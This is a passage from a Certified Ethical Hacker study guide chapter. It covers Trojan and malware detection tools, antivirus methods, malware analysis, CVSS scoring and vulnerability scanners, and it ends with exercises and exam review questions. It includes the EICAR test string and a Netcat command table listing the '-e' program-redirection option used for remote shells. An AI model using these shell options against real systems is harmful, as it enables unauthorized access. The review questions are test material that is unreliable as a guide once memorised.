  • Netstat: It displays active TCP connections, ports on which the computer is listening, Ethernet statistics, the IP routing table, IPv4 statistics, and more. Typing Netstat -an shows a running list of open ports and processes. Table 5-3 shows Netstat switches.

    Table 5-3 Netstat Switches

    Switch

    Function

    -a

    Displays all connections and listening ports

    -r

    Displays the contents of the routing table

    -n

    Instructs Netstat not to convert addresses and port numbers to names

    -s

    Shows per-protocol statistics for IP, ICMP, TCP, and UDP

    -p <protocol>

    Shows connection information for the specified protocol

    -e

    Shows Ethernet statistics and can be combined with -s

    Interval

    Shows a new set of statistics each interval (in seconds)

  • CurrPorts: A Windows tool used to display a list of currently running processes on the local machine.

  • TCPView: A GUI tool originally created by Sysinternals and now maintained by Microsoft that is used to display running processes.

  • Microsoft Computer Management Console: Can be used to examine tasks, events, and performance of a local machine. On a Windows 7 computer, the console is started by entering compmgmt.msc.

  • Process Viewer: Another Windows GUI utility that displays detailed information about running processes. It displays memory, threads, and module use.

  • IceSword: A tool that lists processes in your Windows system and the ports each one listens on. Can be used to find Trojans that might have injected themselves into other processes.

  • Regshot: An open source standalone application capable of showing changes to the file system and Registry by comparing the difference between two snapshots.

Note

Application programming interface (API) monitors are classic tools used for Trojan analysis. They provide a wealth of information about a program’s runtime behavior by intercepting calls to API functions and logging the relevant parameters. Process Monitor is one example of such a tool.

Although not mentioned specifically in this list, Wireshark is another useful tool to have at your disposal should you suspect your system has been compromised by a Trojan. Wireshark can help to find the packets that contain encrypted data. Because you’re dealing with a Trojan and because they usually steal information, you should focus on outbound traffic first. If the Trojan is using HTTP or ICMP, you might see the data in the POST payload or ICMP code. After finding a potential packet, you can isolate the encrypted content from the rest of the packet capture and perform an analysis. Just keep in mind that practicing the principle of “deny all that is not explicitly permitted” is the number one defense against preventing many of the Trojans discussed in this chapter. That is much easier than trying to clean up afterward.

Tip

Never rely on the tools already installed on a system you believe is infected or compromised. Install known-good tools, or run your own from an optical disc.

Another key point is that everything should be checked before being used. Any application that is going to be installed or used should have its file signatures checked. Many sites will provide an SHA2 (or better) hash with their applications to give users an easy way to tell that no changes have been made. Email attachments should also always be checked. In a high-security, controlled environment, a “sheep dip” system can even be used. This term originated from the practice of dipping sheep to make sure that they are clean and free of pests. A sheep dip computer can be used to screen suspect programs and connects to a network only under controlled conditions. A sheep dip computer is a dedicated system used to test files on removable media for malware before they are allowed to be used with other computers. This is similar to a sandbox. It can be used to further examine suspected files, incoming messages, and attachments. Overall, the best way to prevent viruses is by following an easy five-point plan:

Step 1. Install antivirus software.

Step 2. Keep the virus definitions up-to-date. Dated antivirus is not much better than no protection at all.

Step 3. Use common sense when dealing with attachments. If you don’t know who it’s from, it’s something you didn’t request, or it looks suspicious, don’t open it!

Step 4. Keep the system patched. Many viruses exploit vulnerabilities that have previously been found and are well known.

Step 5. Be leery of attachments because they remain one of the primary means of spreading APTs and other malware such as viruses and worms.

Although virus prevention is good practice, there is still the possibility that your system might become infected with a virus. In general, the only way to protect your data from viruses is to maintain current copies of your data. Make sure that you perform regular system backups. A variety of tools are available to help with this task. The three types of backup methods possible are full, incremental, and differential.

Antivirus

Although strategies to prevent viruses are a good first step, antivirus software is an essential layer of protection. Many antivirus products are on the market, including the following:

  • Norton AntiVirus

  • McAfee VirusScan

  • Sophos Antivirus

  • AVG AntiVirus

Antivirus programs can use one or more techniques to check files and applications for viruses. These techniques include

  • Signature scanning

  • Heuristic scanning

  • Integrity checking

  • Activity blocking

Signature-scanning antivirus programs work in a fashion similar to intrusion detection system (IDS) pattern-matching systems. Signature-scanning antivirus software looks at the beginning and end of executable files for known virus signatures. Signatures are nothing more than a series of bytes found in the virus’s code. Here is an example of a virus signature:

X5O!P%@AP[4 PZX54(P^)7CC)7$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

If you were to copy this into a text file and rename it as an executable, your antivirus should flag it as a virus. It is not actually a virus, and the code is harmless. It is just a tool developed by the European Institute of Computer Antivirus Research (EICAR) to test the functionality of antivirus software. Virus creators attempt to circumvent the signature process by making viruses polymorphic.

Heuristic scanning is another method that antivirus programs use. Software designed for this function examines computer files for irregular or unusual instructions. For example, think of your word processing program; it probably creates, opens, or updates text files. If the word processor were to attempt to format the C: drive, this is something that heuristics would quickly identify, as that’s not the usual activity of a word processor. In reality, antivirus vendors must strike a balance with heuristic scanning because they don’t want to produce too many false positives or false negatives. Many antivirus vendors use a scoring technique that looks at many types of behaviors. Only when the score exceeds a threshold does the antivirus actually flag an alert.

Integrity checking can also be used to scan for malware. Integrity checking works by building a database of checksums or hashed values. These values are saved in a file. Periodically, new scans occur, and the results are compared to the stored results.

For instance, in Example 5-3 a file named file1.txt is created.

Example 5-3 The Contents of file1.txt

Click here to view code image

$ cat file1.txt
This is the contents of file 1.
This is only a test.

Example 5-4 shows the SHA checksum of the file (using the Linux shasum command).

Example 5-4 The SHA Checksum of file1.txt

Click here to view code image

$shasum file1.txt
4fc73303cb889f751ecc02f21570e4c7eac3afaf file1.txt

Any change to file1.txt would change this hashed value and make it easy for an integrity checker to detect. For example, in Example 5-5, the contents of file1.txt was changed, and the checksum also changed.

Example 5-5 The SHA Checksum of the Modified File

Click here to view code image

$cat file1.txt
This is the modified contents of file 1.
This is another test.
$shasum file1.txt
c60c1f20fb58c0d80aadc70f75590d0fdbae6064 file1.txt

Activity blockers can also be used by antivirus programs. An activity blocker intercepts a virus when it starts to execute and blocks it from infecting other programs or data. Activity blockers are usually designed to start at boot and continue until the computer is shut down.

One way to test suspected viruses, worms, and malware is to use an online malware checker. An example of these services is the Cisco Talos File Reputation service at https://www.talosintelligence.com/sha_searches and shown in Figure 5-19.

A screenshot shows the home page of Cisco Talos File Reputation tool. The page contains followings icons: software, vulnerability information, reputation center, library, support communities, careers, blog, and about.

Figure 5-19 Talos File Reputation Online Tool

Additional file reputation and online malware scanning sites are listed in Table 5-4.

Table 5-4 Online Virus/Malware Scanning Sites

Name

URL

Service

Talos File Reputation

https://www.talosintelligence.com/talos_file_reputation

Checks multiple sites

Jotti

https://virusscan.jotti.org/

Checks more than 20 sites

VirusTotal

https://www.virustotal.com

Checks multiple sites

ESET

https://www.eset.com/us/online-scanner

Uses one service

Metadefender

https://www.metadefender.com/#!/scan-file

Checks 43 sites

VirSCAN

http://www.virscan.org

Checks 38 sites

The biggest problem with antivirus is that so many pieces of malware are written today to avoid detection.

Analyzing Malware

Malware analysis can be extremely complex. Although an in-depth look at this area of cybersecurity is beyond this book, a CEH should have a basic understanding of how analysis is performed. There are two basic methods to analyze viruses and other malware:

Static Analysis

Image

Static analysis is concerned with the decompiling, reverse engineering, and analysis of malicious software. The field is an outgrowth of the field of computer virus research and malware intent determination. Consider examples such as Conficker, Stuxnet, Aurora, and the Black Hole Exploit Kit. Static analysis makes use of disassemblers and decompilers to format the data into a human-readable format. Several useful tools are listed here:

  • IDA Pro: An interactive disassembler that you can use for decompiling code. It’s particularly useful in situations in which the source code is not available, such as with malware. IDA Pro allows the user to see the source code and review the instructions that are being executed by the processor. IDA Pro uses advanced techniques to make that code more readable. You can download and obtain additional information about IDA Pro at https://www.hex-rays.com/products/ida/.

  • Evan’s Debugger (edb): A Linux cross-platform AArch32/x86/x86-64 debugger. You can download and obtain additional information about Evan’s Debugger at https://github.com/eteran/edb-debugger.

  • BinText: Another tool that is useful to the malware analyst. BinText is a text extractor that will be of particular interest to programmers. It can extract text from any kind of file and includes the ability to find plain ASCII text, Unicode (double-byte ANSI) text, and resource strings, providing useful information for each item in the optional “advanced” view mode. You can download and obtain additional information about BinText from the following URL: https://www.aldeid.com/wiki/BinText.

  • UPX: A packer, compression, and decompression tool. You can download and obtain additional information about UPX at https://upx.github.io.

  • OllyDbg: A debugger that allows for the analysis of binary code where source is unavailable. You can download and obtain additional information about OllyDbg at http://www.ollydbg.de.

Several sites are available that can help analyze suspect malware. These online tools can provide a quick and easy analysis of files when reverse engineering and decompiling is not possible. Most of these sites are easy to use and offer a straightforward point-and-click interface. These sites generally operate as a sandbox. A sandbox is simply a standalone environment that allows you to safely view or execute the program while keeping it contained. A good example of sandbox services include Cuckoo, Joe Sandbox, and ThreatExpert. This great tool tracks changes made to the file system, Registry, memory, and network. Cuckoo even supports an API where you can interact with it programmatically. You can obtain additional information about how to install and use Cuckoo at https://cuckoo.sh/docs/index.html.

During a network security assessment, you may discover malware or other suspicious code. You should have an incident response plan that addresses how to handle these situations. If you’re using only one antivirus product to scan for malware, you may be missing a lot. As you learned in the previous section, websites such as the Cisco Talos File Reputation Lookup site and VirusTotal allow you to upload files to verify if it may be known malware.

These tools and techniques listed offer some insight as to how static malware analysis is performed, but don’t expect malware writers to make the analysis of their code easy. Many techniques can be used to make disassembly challenging:

  • Encryption

  • Obfuscation

  • Encoding

  • Anti-virtual machine

  • Antidebugger

Dynamic Analysis

Image

Dynamic analysis of malware and viruses is the second method that may be used.

Dynamic analysis relates to the monitoring and analysis of computer activity and network traffic. This requires the ability to configure the network device for monitoring, look for unusual or suspicious activity, and try not to alert attackers. This approach requires the preparation of a testbed. Before you begin setting up a dynamic analysis lab, remember that the number one goal is to keep the malware contained. If you allow the host system to become compromised, you have defeated the entire purpose of the exercise. Virtual systems share many resources with the host system and can quickly become compromised if the configuration is not handled correctly. Here are a few pointers for preventing malware from escaping the isolated environment to which it should be confined:

  1. Install a virtual machine (VM).

  2. Install a guest operating system on the VM.

  3. Isolate the system from the guest VM.

  4. Verify that all sharing and transfer of data is blocked between the host operating system and the virtual system.

  5. Copy the malware over to the guest operating system and prepare for analysis.

After you complete those steps, you can then configure some of the analysis tools, including the following:

  • Process Explorer: Allows for a review of running processes, verify signatures on executables, as well as origins. The Systernals Process Explorer is shown in Figure 5-20.

    A screenshot depicts the process explorer window.

    Figure 5-20 Process Explorer

  • TCPView: Identifies active services and applications.

  • NetResident: Provides an in-depth analysis of network traffic.

  • Wireshark: A well-known packet analyzer.

  • Capsa Network Analyzer: A commercial network analysis tool.

  • TCPdump: A command-line network analysis tool.

  • Tripwire: A well-known integrity verification tool.

Malware authors sometimes use anti-VM techniques to thwart attempts at analysis. If you try to run the malware in a VM, it might be designed not to execute. For example, one simple way is to get the MAC address; if the OUI matches a VM vendor, the malware will not execute.

Note

Changing the MAC address is one approach to overcoming this antiexecution technique.

The malware may also look to see whether there is an active network connection. If not, it may refuse to run. One tool to help overcome this barrier is FakeNet. FakeNet simulates a network connection so that malware interacting with a remote host continues to run. If you are forced to detect the malware by discovering where it has installed itself on the local system, there are some known areas to review:

  • Running processes

  • Device drivers

  • Windows services

  • Startup programs

  • Operating system files

Malware has to install itself somewhere, and by a careful analysis of the system, files, memory, and folders, you should be able to find it.

Vulnerability Analysis

Vulnerability analysis is typically done as part of the scanning phase, and it is one of the fundamental tasks of any penetration tester. Vulnerability analysis includes the discovery of security weaknesses in systems, designs, applications, websites, and hardware. A vulnerability scan is an inspection of your systems and infrastructure using tools to detect known vulnerabilities. A penetration test is different. It is an inspection of specific elements of your environment looking for vulnerabilities that may not have been previously detected.

Passive vs. Active Assessments

The following are the types of vulnerability assessments:

  • Passive assessments: Includes packet sniffing to discover vulnerabilities, running applications, processes and services, open ports and other information. In passive assessments, the targeted host is not attacked.

  • Active assessments: In active assessments, the penetration tester sends requests to probe the targeted systems examining their responses.

External vs. Internal Assessments

  • External assessments: This type of assessment is done from an attacker’s point of view to discover vulnerabilities that could be exploited from “outside” attackers (such as attacks coming from the Internet). The main purpose of external assessments is to identify how an attacker can compromise your network and systems from outside your organization.

  • Internal assessments: Internal assessments include finding vulnerabilities inside of your organization that could be exploited by insiders or by other compromised systems in your organizations by an external attacker.

Figure 5-21 shows the main steps of the vulnerability assessment life cycle.

A figure shows the main steps of the vulnerability assessment life cycle. The steps are as follows: Creating a Baseline, Vulnerability Assessment, Risk Assessment, Remediation, Verification, and monitor.

Figure 5-21 The Vulnerability Assessment Life Cycle

Vulnerability Assessment Solutions

There are several vulnerability assessment solutions:

  • Product-based solutions: The organization uses commercial products deployed within the enterprise network to find vulnerabilities. Examples include Qualys, Tenable Nessus, Rapid7, and others. Some of these solutions are sold as security “continuous monitoring” solutions.

  • Service-based solutions: Typically, consulting and auditing services performed by individuals that are contracted outside of the corporation. Additionally, these could be managed security services from managed security service providers (MSSPs).

Tree-based vs. Inference-based Assessments

Image

In a tree-based assessment, an auditor follows different methodologies for each component of the enterprise network. For instance, the auditor may use methodologies for Windows-based systems that are different from Linux-based systems. Another example is methodologies that are used for assessing the security posture of network infrastructure devices will be different from those that are done against end-user systems.

Inference-based assessments are when the auditor finds vulnerabilities depending on protocols that are used by the systems within the organization. For instance, the auditor can find a protocol and look for ports and services related to that protocol.

Vulnerability Scoring Systems

Image

You also need to clearly understand and effectively communicate the impact of the vulnerabilities discovered. As a best practice, you must effectively communicate the overall risk to the corporation. The report should clearly document how the severity or risk ranking is derived.

You should adopt industry-standard score methodologies such as the Common Vulnerability Scoring System (CVSS). CVSS was created by security practitioners in the Forum of Incident Response and Security Teams (FIRST). You can find detailed information about the standard at https://first.org/cvss.

In CVSS, a vulnerability is evaluated under three groups, and a score is assigned to each of them:

  • The base group represents the intrinsic characteristics of a vulnerability that are constant over time and do not depend on a user-specific environment. This is the most important information and the only one that’s mandatory to obtain a vulnerability score.

  • The temporal group assesses the vulnerability as it changes over time.

  • The environmental group represents the characteristics of a vulnerability, taking into account the organizational environment.

The score for the base group is between 0 and 10, where 0 is the least severe and 10 is assigned to highly critical vulnerabilities. For example, a highly critical vulnerability could allow an attacker to remotely compromise a system and get full control. Additionally, the score comes in the form of a vector string that identifies each of the components used to make up the score. The vector is used to record or transfer CVSS metric information in a concise form. The vector string starts with the label “CVSS:” and a numeric representation of the CVSS version, followed by each metric in abbreviated form. Currently, CVSS scores may be depicted as either CVSS 2.0 or CVSS 3.0. Although CVSS 2.0 is still available, CVSS 3.0 is the more current and represents an enhanced exposure analysis. It is possible for a product to have a CVSS 2.0 score of high while its CVSS 3.0 score is critical.

The following is an example of a CVSS 3.0 vector:

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L

The formula used to obtain the score takes into account various characteristics of the vulnerability and how the attacker can leverage these characteristics. CVSSv3 defines several characteristics for the base, temporal, and environmental groups.

The base group defines Exploitability metrics that measure how the vulnerability can be exploited, as well as Impact metrics that measure the impact on confidentiality, integrity, and availability. In addition to these two metrics, a metric called Scope Change (S) is used to convey impact on systems that are impacted by the vulnerability but do not contain vulnerable code.

The Exploitability metrics include the following:

  • Attack Vector (AV) represents the context by which a vulnerability can be exploited. It can assume four values:

    • Network (N)

    • Adjacent (A)

    • Local (L)

    • Physical (P)

  • Attack Complexity (AC) represents the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability. The values can be the following:

    • Low (L)

    • High (H)

  • Privileges Required (PR) represents the level of privileges an attacker must have to exploit the vulnerability. The values are as follows:

    • None (N)

    • Low (L)

    • High (H)

  • User Interaction (UI) captures whether a user interaction is needed to perform an attack. The values are as follows:

    • None (N)

    • Required (R)

  • Scope (S) captures the impact on systems other than the system being scored. The values are as follows:

    • Unchanged (U)

    • Changed (C)

The Impact metrics include the following:

  • Confidentiality (C) measures the degree of impact on the confidentiality of the system. It can assume the following values:

    • Low (L)

    • Medium (M)

    • High (H)

  • Integrity (I) measures the degree of impact on the integrity of the system. It can assume the following values:

    • Low (L)

    • Medium (M)

    • High (H)

  • Availability (A) measures the degree of impact on the availability of the system. It can assume the following values:

    • Low (L)

    • Medium (M)

    • High (H)

The temporal group includes three metrics:

  • Exploit Code Maturity (E), which measures whether a public exploit is available

  • Remediation Level (RL), which indicates whether a fix or workaround is available

  • Report Confidence (RC), which indicates the degree of confidence in the existence of the vulnerability

The environmental group includes two main metrics:

  • Security Requirements (CR, IR, AR), which indicate the importance of confidentiality, integrity, and availability requirements for the system

  • Modified Base Metrics (MAV, MAC, MAPR, MUI, MS, MC, MI, MA), which allow the organization to tweak the base metrics based on a specific characteristic of the environment

For example, a vulnerability that might allow a remote attacker to crash the system by sending crafted IP packets would have the following values for the base metrics:

  • Attack Vector (AV) would be Network because the attacker can be anywhere and can send packets remotely.

  • Attack Complexity (AC) would be Low because it is trivial to generate malformed IP packets (for example, via a Python script).

  • Privileges Required (PR) would be None because there are no privileges required by the attacker on the target system.

  • User Interaction (UI) would also be None because the attacker does not need to interact with any user of the system in order to carry out the attack.

  • Scope (S) would be Unchanged if the attack does not cause other systems to fail.

  • Confidentiality Impact (C) would be None because the primary impact is on the availability of the system.

  • Integrity Impact (I) would be None because the primary impact is on the availability of the system.

  • Availability Impact (A) would be High because the device could become completely unavailable while crashing and reloading.

Additional examples of CVSSv3 scoring are available at the FIRST website (https://www.first.org/cvss).

In numerous instances, security vulnerabilities are not exploited in isolation. Threat actors exploit more than one vulnerability “in a chain” to carry out their attack and compromise their victims. By leveraging different vulnerabilities in a chain, attackers can infiltrate progressively further into the system or network and gain more control over it. Developers, security professionals, and users must be aware of this because chaining can change the order in which a vulnerability needs to be fixed or patched in the affected system. For instance, multiple low-severity vulnerabilities can become a severe one if they are combined.

Performing vulnerability chaining analysis is not a trivial task. Although several commercial companies claim that they can easily perform chaining analysis, in reality, the methods and procedures that can be included as part of a chain vulnerability analysis are pretty much endless. Security teams should utilize an approach that works for them to achieve the best end result.

Exploits cannot exist without a vulnerability; however, there isn’t always an exploit for a given vulnerability. An exploit is a piece of software or a collection of reproducible steps that leverages a given vulnerability to compromise an affected system.

In some cases, users call vulnerabilities without exploits “theoretical vulnerabilities.” One of the biggest challenges with “theoretical vulnerabilities” is that there are many smart people out there capable of exploiting them. If you do not know how to exploit a vulnerability today, it does not mean that someone else will not find a way in the future. In fact, someone else may already have found a way to exploit the vulnerability and perhaps is even selling the exploit of the vulnerability in underground markets without public knowledge.

Vulnerability Scanning Tools

Image

There are numerous vulnerability scanning tools, including open source and commercial vulnerability scanners, as well as cloud-based services and tools. The following are some of the most popular vulnerability scanners:

  • OpenVAS

  • Nessus

  • Nexpose

  • Qualys

  • SQLmap

  • Nikto

  • Burp Suite

  • OWASP Zed Attack Proxy (ZAP)

  • W3AF

  • SPARTA

Tip

OWASP lists additional vulnerability scanning tools at https://www.owasp.org/ index.php/Category:Vulnerability_Scanning_Tools.

OpenVAS is an open source vulnerability scanner that was created by Greenbone Networks. The OpenVAS framework includes several services and tools that enable you to perform detailed vulnerability scanning against hosts and networks. OpenVAS can be downloaded from https://github.com/greenbone/openvas-scanner, and the documentation can be accessed at https://docs.greenbone.net/#user_documentation.

OpenVAS also includes an API that allows you to programmatically interact with its tools and automate the scanning of hosts and networks. The OpenVAS API documentation can be accessed at https://docs.greenbone.net/#api_documentation.

Nessus is a scanner created by Tenable that has several features that allow you to perform continuous monitoring and compliance analysis. Nessus can be downloaded from https://www.tenable.com/downloads/nessus.

Tenable also has a cloud-based solution called Tenable.io. For additional information about Tenable.io, see https://www.tenable.com/products/tenable-io.

Nexpose is a vulnerability scanner created by Rapid7 that is very popular among professional penetration testers. It supports integrations with other security products.

Rapid7 also has several vulnerability scanning solutions that are used for vulnerability management, continuous monitoring, and secure development life cycle.

Qualys is a security company that created one of the most popular vulnerability scanners in the industry. It also has a cloud-based service that performs continuous monitoring, vulnerability management, and compliance checking. This cloud solution interacts with cloud agents, virtual scanners, scanner appliances, and Internet scanners. Information about the Qualys scanner and cloud platform can be accessed at https://www.qualys.com.

Tools like Qualys and Nessus also provide features that can be used for configuration compliance.

Summary

This chapter started by describing attacks against the weakest link, which is the human element. These attacks are called social engineering attacks. Social engineering has been the initial attack vector of many breaches and compromises in the past several years. In this chapter, you learned different social engineering attacks, such as phishing, pharming, malvertising, spear phishing, whaling, and others. You also learned social engineering techniques such as elicitation, interrogation, and impersonation, as well as different motivation techniques. You learned what shoulder surfing is and how attackers have used the “USB key drop” trick to fool users into installing malware and compromising their systems.

Additionally, this chapter introduced a wide range of malicious programs. It introduced viruses, worms, Trojans, backdoors, port redirection, covert communications, spyware, keystroke loggers, and malware detection/analysis. Ethical hackers should understand how Trojans work, their means of transmission, their capabilities, and how they can be detected and prevented. Many Trojans open backdoors on the victim’s computer. Backdoors are openings to the system that can be used to bypass the normal authentication process. Other Trojans use covert channels for communication. A covert channel is a communications channel that enables a Trojan to transfer information in a manner that violates the system’s security policy and cannot normally be detected. Loki is a good example of a covert channel program because it uses ping packets to communicate. Port redirection is another option that many of these tools possess. Port redirection can be used to accept connections on a specified port and then resend the data to a second specified port. Port redirection is used to bypass firewall settings and to make a hacker’s activity harder to track.

Spyware was also discussed in this chapter. Spyware shares many of the same traits as Trojans and is used to collect information or redirect a user to an unrequested site. The makers of spyware have adopted many of the same techniques used by Trojan developers to deploy their tools and avoid detection after installation.

Countermeasures to these types of malicious code were discussed. Up-to-date antivirus is always a good first step, and having the ability to find these programs is also helpful. That is why you were introduced to a variety of tools, including Netstat, TCPView, Process Viewer, and others. Just as with all other aspects of security, a good offense is worth more than a good defense; therefore, the principle of “deny all” should always be practiced. Simply stated, unless a port or application is needed, it should be turned off by default and blocked at the firewall.

Finally, vulnerability analysis was also discussed in this chapter. You learned the difference between passive and active vulnerability assessments. You also learned the difference between external and internal vulnerability assessments and the different types of vulnerability assessment solutions. This chapter also discussed the difference between tree-based and inference-based vulnerability assessments, and you learned about the details about vulnerability scoring systems, such as the CVSS industry standard. Examples of vulnerability scanning tools were also discussed in this chapter.

Exam Preparation Tasks

As mentioned in the section “How to Use This Book” in the Introduction, you have several choices for exam preparation: the exercises here, Chapter 12, “Final Preparation,” and the exam simulation questions in the Pearson Test Prep Software Online.

Review All Key Topics

Review the most important topics in this chapter, noted with the Key Topic icon in the outer margin of the page. Table 5-5 lists a reference of these key topics and the page numbers on which each is found.

Table 5-5 Key Topics for Chapter 5

Image

Key Topic Element

Description

Page Number

Section

Phishing

200

Section

Pharming

200

Section

Spear phishing

202

Section

Elicitation, interrogation, and impersonation (pretexting)

210

Section

Types and transmission methods of viruses and malware

213

Section

Trojan infection mechanisms

223

Section

Trojan tools

225

Section

Defines wrappers

228

Section

Defines packers

229

Section

Defines droppers

229

Section

Defines crypters

229

Section

Explains ransomware

230

Section

Explains port redirection

238

Section

Explains keystroke logging (keyloggers) and spyware

240

Section

Hardware keyloggers

241

Section

Software keyloggers

241

List

Explains common Trojan and backdoor countermeasures

243

Section

Describes static analysis

250

Section

Describes dynamic analysis

251

Section

Tree-based vs. inference-based assessments

255

Section

Explains the Common Vulnerability Scoring System (CVSS).

255

Section

Vulnerability scanning tools

259

Define Key Terms

Define the following key terms from this chapter and check your answers in the glossary:

backdoor

covert channel

denial of service (DoS)

keylogger (keystroke logger)

port redirection

social engineering

spyware

Tini

Trojan

virus

worm

wrapper

dropper

crypter

ransomware

static analysis

dynamic analysis

CVSS

Command Reference to Check Your Memory

Table 5-6 includes the most important configuration and EXEC commands covered in this chapter. It might not be necessary to memorize the complete syntax of every command, but you should be able to remember the basic keywords that are needed.

Table 5-6 Netcat Commands

Command Syntax

Task

nc -d

Used to detach Netcat from the console

nc -l -p [port]

Used to create a simple listening TCP port; adding -u places it into UDP mode

nc -e [program]

Used to redirect stdin/stdout from a program

nc -w [timeout]

Used to set a timeout before Netcat automatically quits

nc -u

Used to run Netcat in UDP mode

The CEH exam focuses on practical, hands-on skills that are used by a networking professional. Therefore, you should be able to identify the commands needed to configure common tools, such as Netcat, that might be found on the CEH exam.

Exercises

5.1 Finding Malicious Programs

In this exercise, you look at some common ways to find malicious code on a computer system:

Estimated Time: 15 minutes.

Step 1. Unless you already have a Trojan installed on your computer, you will need something to find. Go to https://github.com/diegocr/netcat/ and download Netcat for Windows.

Step 2. Start up a Netcat listener on your computer. You can do so by issuing the following command from the command prompt:

nc -n -v -l -p 80

Step 3. Now that you have Netcat running and in listening mode, proceed to Task Manager. You should clearly see Netcat running under Applications.

Step 4. Now turn your attention to Netstat. Open a new command prompt and type netstat -an. You should see a listing similar to the one shown here:

Click here to view code image

C: >netstat -an
Active Connections
ProtoLocal AddressForeign Address State
TCP0.0.0.0:80 0.0.0.0:0 LISTENING
TCP0.0.0.0:4450.0.0.0:0 LISTENING
TCP0.0.0.0:1025 0.0.0.0:0 LISTENING
TCP0.0.0.0:1027 0.0.0.0:0 LISTENING
TCP0.0.0.0:123450.0.0.0:0 LISTENING

Step 5. Your results should include a listing similar to the first one shown, indicating that port 80 is listening. Did you notice anything else unusual in your listing? Did you notice anything unusual in the listing shown previously? The preceding listing shows a service listening on port 12345, which is the default port for NetBus.

Step 6. Proceed to https://technet.microsoft.com/en-us/sysinternals/tcpview and download TCPView. This free GUI-based process viewer shows you information about running processes in greater detail than Netstat. It provides information for all TCP and UDP endpoints on your system, including the local and remote addresses and state of TCP connections. You should be able to easily spot your Netcat listener if it is still running.

Step 7. Close TCPView and proceed to https://technet.microsoft.com/en-us/sysinternals/processexplorer. From there, you can download another process tool known as Process Explorer. You will find that it is similar to TCPView and should enable you to easily spot your Netcat listener if it is still running.

Step 8. Remove Netcat or any of the other programs installed during this exercise that you no longer want to use.

5.2 Using Process Explorer

In this exercise, you examine Process Explorer.

Estimated Time: 15 minutes.

Step 1. Download Process Explorer from http://technet.microsoft.com/en-us/sysinternals/processexplorer.

Step 2. Place the downloaded file in a folder of your choosing and open a command prompt in that folder.

Step 3. From the command line, type procexp.

Step 4. This tool is similar to Task Manager but offers much more information. Observe the much more detailed information available over the regular Task Manager application. Inevitably, some items will be highlighted, primarily blue, pink, and purple. Blue highlighting designates the security context; more specifically, it indicates that the process is running in the same context as the Process Explorer application. Pink highlighting is indicative of Windows services, and purple highlighting represents items that are compressed or encrypted, often referred to as packed.

Step 5. Open a web browser, and then double-click its process from within Process Explorer. You should default to the Image tab. Observe the vast amount of information readily available. For instance, you can see the version and time information, the path to the parent application, the command used to initiate the process, this process’s parent process, and so on. In addition, you can verify/kill or suspend the process.

Step 6. Click the Performance tab. Note that you have access to I/O data and handles in addition to the CPU and memory information available via Task Manager.

Step 7. Click the Threads tab. Observe the available CPU thread information. In addition to CPU utilization details, you have access to thread IDs, the start time, address, and so on.

Step 8. Double-click one of the threads. Note that you are now looking at the stack for that particular thread ID (TID).

Step 9. Click OK.

Step 10. Click Permissions. You can now view and possibly change permissions and inheritance for specific threads.

Step 11. Peruse the remaining tabs, taking note of the various information that is readily available.

Step 12. Close Process Explorer.

Review Questions

1. You have discovered that several of your team members’ computers were infected. The attack was successful because the attacker guessed or observed which websites the victims visited and infected one or more of those sites with malware. Which type of attack was executed?

a. Spear phishing attack

b. Phishing attack

c. Watering hole attack

d. SMiShing attack

2. Which of the following is not true about pharming?

a. Pharming can be done by altering the host file on a victim’s system

b. Threat actors performing a pharming attack can leverage DNS poisoning and exploit DNS-based vulnerabilities.

c. In a pharming attack, a threat actor redirects a victim from a valid website or resource to a malicious one that could be made to look like the valid site to the user.

d. Pharming can be done by exploiting a buffer overflow using Windows PowerShell.

3. Which of the following refers to the act of incorporating malicious ads on trusted websites, which results in users’ browsers being inadvertently redirected to sites hosting malware?

a. Malvertising

b. Pharming

c. Active ad exploitation

d. Whaling

4. Which of the following is true about spear phishing?

a. Spear phishing attacks use the Windows Administrative Center.

b. Spear phishing is phishing attempts that are constructed in a very specific way and directly targeted to specific individuals or companies.

c. Spear phishing, whaling, and phishing are the same type of attack.

d. Spear phishing attacks use the Windows PowerShell.

5. Which of the following is an example of a social engineering attack that is not related to email?

a. SMS command injection

b. SMS buffer overflow

c. SMS phishing

d. Pretexting

6. Which of the following is true about social engineering motivation techniques?

a. Social proof can be used to create a feeling of urgency in a decision-making context. It is possible to use specific language in an interaction to present a sense of urgency and manipulate the victim.

b. Scarcity can be used to create a feeling of urgency in a decision-making context. It is possible to use specific language in an interaction to present a sense of urgency and manipulate the victim.

c. Scarcity cannot be used to create a feeling of urgency in a decision-making context. It is possible to use specific language in an interaction to present a sense of urgency and manipulate your victim.

d. Social proof cannot be used in an interrogation because it is illegal. It is not legal to use specific language in an interaction to present a sense of urgency and manipulate your victim.

7. Which of the following best describes a covert communication?

a. A program that appears desirable, but actually contains something harmful

b. A way of getting into a guarded system without using the required password

c. Sending and receiving unauthorized information or data by using a protocol, service, or server to transmit info in a way in which it was not intended to be used

d. A program or algorithm that replicates itself over a computer network and usually performs malicious actions

8. Which of the following best describes Netcat?

a. Netcat is a more powerful version of Snort and can be used for network monitoring and data acquisition. This program enables you to dump the traffic on a network. It can also be used to print out the headers of packets on a network interface that matches a given expression.

b. Netcat is called the TCP/IP Swiss army knife. It works with Windows and Linux and can read and write data across network connections using TCP or UDP.

c. Netcat is called the TCP/IP Swiss army knife. It is a simple Windows-only utility that reads and writes data across network connections using TCP or UDP.

d. Netcat is called the TCP/IP Swiss army knife. It is a simple Linux-only utility that reads and writes data across network connections using TCP or UDP.

9. A business has hired you as a penetration tester after a recent security breach. The attacker was successful at planting a Trojan on one internal server and extracting all its financial data. Which of the following is an immediate recommendation that you can give the business?

a. Require all employees to move from 7-character to 14-character passwords.

b. Harden the web server.

c. Immediately move the financial data to another system.

d. Budget for a new web application firewall to perform deep packet inspection.

10. Your Windows computer is running erratically, and you suspect that spyware has been installed. You have noticed that each time you try to go to an antivirus website, your computer is redirected to another domain and you are flooded with pop-ups. What file did the spyware most likely modify?

a. /etc/hosts

b. Hosts

c. Boot.ini

d. Config.ini

11. While getting ready to pay some bills, you visit your bank’s website and prepare to log in. However, you notice that the login page now has several additional fields where your bank ATM and your Social Security number are requested. What category of banking Trojan could be responsible for this modification?

a. A form grabber

b. HTML injection

c. A TAN grabber

d. A SID grabber

12. Which covert communication program can bypass router ACLs that block incoming SYN traffic on port 80?

a. Loki

b. AckCmd

c. Stealth Tools

d. Firekiller 2000

13. What does the command nc -n -v -l -p 25 accomplish?

a. Allows the hacker to use a victim’s mail server to send spam

